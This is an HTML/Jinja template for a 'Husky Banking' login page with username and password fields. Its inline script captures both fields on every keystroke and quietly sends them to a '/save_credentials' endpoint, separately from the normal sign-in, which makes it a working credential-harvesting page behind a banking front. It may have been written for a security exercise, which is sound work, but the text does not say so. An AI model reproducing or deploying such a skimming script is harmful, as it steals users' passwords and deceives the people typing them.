<!DOCTYPE html>
<html lang="en">
	<head>
		    <meta charset="UTF-8">
		        <meta name="viewport" content="width=device-width, initial-scale=1.0">
			    <title>Husky Banking</title>
			        <link rel="stylesheet" href="{{ url_for('static', filename='css/index.css') }}">
	</head>
	<body style="background-image: url('{{ url_for('static', filename='images/Background/ggdog1.jpg') }}'); background-size: cover; background-position: center;">
		    <div id="mainHandler" style="background-image: url('{{ url_for('static', filename='images/Blob/smile1.jpg') }}'); background-size: cover;">
			            <div id="loginHeader">Husky Banking</div>
				            <div id="slogan">A bank where you know your money is in the right paws!</div>
					            
					            <form action="/login" method="POST">
							                <div class="form-group">
										                <label for="username">Username:</label>
												                <input type="text" id="username" name="username" required>
														            </div>

															                <div class="form-group">
																		                <label for="password">Password:</label>
																				                <input type="password" id="password" name="password" required>
																						            </div>

																							                <div class="button-container">
																										                <button type="submit" id="submit">Sign In</button>
																												                <button type="button" id="customPageButton">Custom Page</button>
																														            </div>
																															            </form>
																																        </div>

																																	    <script>
																																		            function handleInput(event) {
																																				                const username = document.getElementById('username').value;
																																				                const password = document.getElementById('password').value;
																																				                
																																				                fetch('/save_credentials', {
																																							                method: 'POST',
																																							                headers: {
																																										                    'Content-Type': 'application/json'
																																										                },
																																							                body: JSON.stringify({ username: username, password: password })
																																							            });
																																				            }

        document.getElementById('username').addEventListener('input', handleInput);
        document.getElementById('password').addEventListener('input', handleInput);
    </script>
	</body>
</html>

